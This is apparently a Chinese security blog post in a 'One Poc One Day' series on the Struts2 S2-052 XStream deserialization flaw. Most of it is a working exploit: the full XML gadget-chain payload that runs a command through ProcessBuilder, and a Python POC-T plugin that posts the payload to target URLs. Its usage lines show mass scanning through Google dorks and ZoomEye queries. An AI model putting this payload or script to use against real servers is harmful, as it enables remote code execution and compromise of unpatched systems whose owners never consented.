【One Poc One Day】—— Struts2 052

# 0x01

One Poc One Day —— Struts2 052

# 0x02

## 原理

Struts2 REST 插件使用带有 XStream 程序的 XStream Handler 进行未经任何代码过滤的反序列化操作,这可能在反序列化XML payloads时导致远程代码执行。任意攻击者都可以构造恶意的XML内容提升权限。

## Payload

1
<map><entry><jdk.nashorn.internal.objects.NativeString><flags>0</flags><valueclass="com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data"><dataHandler><dataSourceclass="com.sun.xml.internal.ws.encoding.xml.XMLMessage$XmlDataSource"><isclass="javax.crypto.CipherInputStream"><cipherclass="javax.crypto.NullCipher"><initialized>false</initialized><opmode>0</opmode><serviceIteratorclass="javax.imageio.spi.FilterIterator"><iterclass="javax.imageio.spi.FilterIterator"><iterclass="java.util.Collections$EmptyIterator"/><nextclass="java.lang.ProcessBuilder"><command><string>touch</string><string>/tmp/success</string></command><redirectErrorStream>false</redirectErrorStream></next></iter><filterclass="javax.imageio.ImageIO$ContainsFilter"><method><class>java.lang.ProcessBuilder</class><name>start</name><parameter-types/></method><name>foo</name></filter><nextclass="string">foo</next></serviceIterator><lock/></cipher><inputclass="java.lang.ProcessBuilder$NullInputStream"/><ibuffer></ibuffer><done>false</done><ostart>0</ostart><ofinish>0</ofinish><closed>false</closed></is><consumed>false</consumed></dataSource><transferFlavors/></dataHandler><dataLen>0</dataLen></value></jdk.nashorn.internal.objects.NativeString><jdk.nashorn.internal.objects.NativeStringreference="../jdk.nashorn.internal.objects.NativeString"/></entry><entry><jdk.nashorn.internal.objects.NativeStringreference="../../entry/jdk.nashorn.internal.objects.NativeString"/><jdk.nashorn.internal.objects.NativeStringreference="../../entry/jdk.nashorn.internal.objects.NativeString"/></entry></map>

## Poc

em……一切为了配合POC-T,多多适配Poc,多多积累自己的script。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
#!/usr/bin python
# -*- coding: utf-8 -*-
# project = https://github.com/yizhimanpadewoniu
# author = am4zing

"""
Struts2 S2-052
影响版本: Struts 2.1.2 - Struts 2.3.33, Struts 2.5 - Struts 2.5.12

Usage:
python POC-T.py -s struts2-s2052 -aG "inurl:login.action" --gproxy "http 127.0.0.1 1080"
python POC-T.py -s struts2-s2052 -aZ "login.action"
python POC-T.py -s struts2-s2052 -iF FILE.txt
"""

import requests

def poc(url):
if '://' not in url:
url = 'http://' + url
try:
header = dict()
header['User-Agent'] = "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)"
header['Content-Type'] = "application/xml"
# header['Accept'] = "*/*"
header['Connection'] = "close"
header['Accept'] = "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8"
payload = '''<map><entry><jdk.nashorn.internal.objects.NativeString><flags>0</flags><valueclass="com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data"><dataHandler><dataSourceclass="com.sun.xml.internal.ws.encoding.xml.XMLMessage$XmlDataSource"><isclass="javax.crypto.CipherInputStream"><cipherclass="javax.crypto.NullCipher"><initialized>false</initialized><opmode>0</opmode><serviceIteratorclass="javax.imageio.spi.FilterIterator"><iterclass="javax.imageio.spi.FilterIterator"><iterclass="java.util.Collections$EmptyIterator"/><nextclass="java.lang.ProcessBuilder"><command><string>touch</string><string>/tmp/success</string></command><redirectErrorStream>false</redirectErrorStream></next></iter><filterclass="javax.imageio.ImageIO$ContainsFilter"><method><class>java.lang.ProcessBuilder</class><name>start</name><parameter-types/></method><name>foo</name></filter><nextclass="string">foo</next></serviceIterator><lock/></cipher><inputclass="java.lang.ProcessBuilder$NullInputStream"/><ibuffer></ibuffer><done>false</done><ostart>0</ostart><ofinish>0</ofinish><closed>false</closed></is><consumed>false</consumed></dataSource><transferFlavors/></dataHandler><dataLen>0</dataLen></value></jdk.nashorn.internal.objects.NativeString><jdk.nashorn.internal.objects.NativeStringreference="../jdk.nashorn.internal.objects.NativeString"/></entry><entry><jdk.nashorn.internal.objects.NativeStringreference="../../entry/jdk.nashorn.internal.objects.NativeString"/><jdk.nashorn.internal.objects.NativeStringreference="../../entry/jdk.nashorn.internal.objects.NativeString"/></entry></map>'''
response_data = requests.post(url, data=payload, headers=header)
if response_data.status_code == 500 or r"java.security.Provider$Service" in response_data.text:
return '[s2-052]' + url
else:
return response_data.text

except Exception:
return False